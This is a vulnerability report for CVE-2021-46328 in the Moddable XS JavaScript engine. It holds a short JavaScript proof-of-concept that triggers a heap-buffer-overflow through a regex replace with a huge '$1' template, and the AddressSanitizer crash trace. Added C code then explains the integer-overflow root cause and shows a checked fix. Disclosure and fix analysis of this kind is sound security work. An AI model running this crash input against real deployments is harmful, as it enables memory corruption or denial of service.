CVE-2021-46328: Heap-buffer-overflow in __libc_start_main · Issue #751 · Moddable-OpenSource/moddable
Moddable SDK v11.5.0 (XS engine) contains a heap-buffer-overflow in fxPushSubstitutionString (xs/sources/xsString.c), reached through String.prototype.replace with a RegExp and a very long replacement template. The CVE text attributes the bug to "the component __libc_start_main", but that is only the outermost frame of the reported stack trace; the faulting write is the memcpy in fxPushSubstitutionString.
Heap-buffer-overflow in __libc_start_main #751
Closed
hope-fly opened this issue
Dec 14, 2021
· 1 comment
Moddable-XS revision
Commit: db8f973
Version: 11.5.0 32 4
Build environment
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
cd ~/moddable/xs/makefiles/lin
make debug
Test case
function JSEtest(x, n) {
  while (x.length < n) { x += x; }   // double until at least n chars
  return x.substring(0, n);
}
var x = JSEtest("1", 1 << 20);       // 1 MiB subject, matched whole by /(.+)/
var rep = JSEtest("$1", 1 << 16);    // 65536 chars = 32768 "$1" tokens
var y = x.replace(/(.+)/g, rep);     // expands 32768 copies of the 1 MiB capture
y.length;
Execution & Output
$ ./xst test.js
=================================================================
ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f62dd0fe820 at pc 0x7f62e0bf477a bp 0x7ffd65c0fc60 sp 0x7ffd65c0f408
WRITE of size 1048576 at 0x7f62dd0fe820 thread T0
    #0 0x7f62e0bf4779 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79779)
    #1 0x564bd7f19243 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
    #2 0x564bd7f19243 in fxPushSubstitutionString /root/moddable/xs/sources/xsString.c:1989
    #3 0x564bd7e46db6 in fx_RegExp_prototype_replace /root/moddable/xs/sources/xsRegExp.c:834
    #4 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #5 0x564bd7f1c334 in fx_String_prototype_withRegexp /root/moddable/xs/sources/xsString.c:1675
    #6 0x564bd7f1c334 in fx_String_prototype_replace /root/moddable/xs/sources/xsString.c:1120
    #7 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #8 0x564bd7ebcc27 in fxRunScript /root/moddable/xs/sources/xsRun.c:4766
    #9 0x564bd80ce90a in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387
    #10 0x564bd79f54c7 in main /root/moddable/xs/tools/xst.c:281
    #11 0x7f62e01eebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    #12 0x564bd79f70c9 in _start (/root/moddable/build/bin/lin/debug/xst+0x950c9)

0x7f62dd0fe820 is located 0 bytes to the right of 16777248-byte region [0x7f62dc0fe800,0x7f62dd0fe820)
allocated by thread T0 here:
    #0 0x7f62e0c59b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x564bd7d2fa66 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506
    #2 0x564bd7d630a3 in fxAllocate /root/moddable/xs/sources/xsMemory.c:170
    #3 0x564bd7a19d9a in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1367
    #4 0x564bd79f2ddf in main /root/moddable/xs/tools/xst.c:259
    #5 0x7f62e01eebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79779)
Shadow bytes around the buggy address:
  0x0fecdba17cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fecdba17d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
Credits: Found by OWL337 team.
mkellner pushed a commit that referenced this issue
Dec 21, 2021
phoddie (Collaborator) commented Dec 21, 2021
Nice find. We have eliminated several other integer overflow issues recently, but clearly overlooked this one.
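The test case above and the maintainer's remark about integer overflow point at one root cause: the replacement result is sized as (length of the capture) times (number of "$1" tokens), and with a 1 MiB capture and 32768 tokens that product is 2^35, which is 0 modulo 2^32. A 32-bit length therefore wraps, the output buffer is undersized, and the first memcpy of the 1 MiB capture runs past it, which is exactly the 1048576-byte WRITE ASan reports. The following is an added example, not code from the Moddable XS sources: a minimal model of that unchecked computation beside an overflow-checked version, with a toy "$1"-only expander that refuses the PoC sizes instead of allocating too little. The function names, the 32-bit length type and the "$1"-only template are assumptions made for illustration.

```c
// Added example (not Moddable XS code): model of a wrapping result-length
// computation in a regexp replace, and the checked variant that rejects it.
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Unchecked: the PoC capture is 1 << 20 bytes and the template holds 1 << 15
 * "$1" tokens (65536 chars / 2). The product is 1 << 35, which wraps to 0 in
 * 32 bits, so a buffer sized from it is far too small for the first copy. */
uint32_t unchecked_result_len(uint32_t match_len, uint32_t token_count) {
    return match_len * token_count;   /* wraps silently: (1<<20) * (1<<15) == 0 */
}

/* Checked: multiply in 64 bits and refuse any result that does not fit the
 * 32-bit length assumed to be used downstream. */
bool checked_result_len(uint32_t match_len, uint32_t token_count, uint32_t *out) {
    uint64_t wide = (uint64_t)match_len * token_count;
    if (wide > UINT32_MAX)
        return false;
    *out = (uint32_t)wide;
    return true;
}

/* Toy substitution: expand `token_count` copies of "$1" against a capture of
 * `match_len` bytes. Returns NULL when the result length would overflow, so no
 * undersized buffer is ever allocated and written past. */
char *expand_dollar1(const char *match, uint32_t match_len, uint32_t token_count) {
    uint32_t total;
    if (!checked_result_len(match_len, token_count, &total))
        return NULL;
    char *out = malloc((size_t)total + 1);
    if (!out)
        return NULL;
    for (uint32_t i = 0; i < token_count; i++)
        memcpy(out + (size_t)i * match_len, match, match_len);  /* in bounds: total validated */
    out[total] = '\0';
    return out;
}

int main(void) {
    /* Constructed values matching the PoC: 1 MiB capture, 32768 "$1" tokens. */
    uint32_t match_len = 1u << 20, tokens = 1u << 15, total;
    printf("unchecked length: %u\n", unchecked_result_len(match_len, tokens));
    printf("checked: %s\n",
           checked_result_len(match_len, tokens, &total) ? "fits" : "overflow, refused");
    char *s = expand_dollar1("ab", 2, 3);   /* a small case that does fit */
    printf("expanded: %s\n", s ? s : "(null)");
    free(s);
    return 0;
}
```

The check belongs before the allocation, not after the copy: once the product has wrapped, `malloc` happily returns a small region and every subsequent bounds decision is made against the wrong size. Doing the multiplication in a wider type (or with `__builtin_mul_overflow` on compilers that provide it) and failing closed is the pattern that removes this whole class of bug.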